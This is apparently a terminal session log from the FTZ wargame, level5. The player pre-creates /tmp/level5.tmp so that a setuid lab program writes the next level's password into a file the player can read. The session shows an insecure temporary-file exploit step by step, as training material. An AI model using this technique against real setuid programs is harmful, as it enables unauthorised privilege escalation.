login as: level5
level5@192.168.244.128's password:
[level5@ftz level5]$ ls
hint public_html tmp
[level5@ftz level5]$ cat hint
/usr/bin/level5 프로그램은 /tmp 디렉토리에
level5.tmp 라는 이름의 임시파일을 생성한다.
이를 이용하여 level6의 권한을 얻어라.
[level5@ftz level5]$ cd /usr/bin
[level5@ftz bin]$ file level5
level5: setuid executable, can't read `level5' (Permission denied).
[level5@ftz bin]$ level5
[level5@ftz bin]$ cd /tmp
[level5@ftz tmp]$ ls
mysql.sock
[level5@ftz tmp]$ cat > level5.tmp
asdf
[level5@ftz tmp]$ cd /usr/bin
[level5@ftz bin]$ level5
[level5@ftz bin]$ cd /tmp
[level5@ftz tmp]$ ls
level5.tmp mysql.sock
[level5@ftz tmp]$ cat level5.tmp
next password : what the hell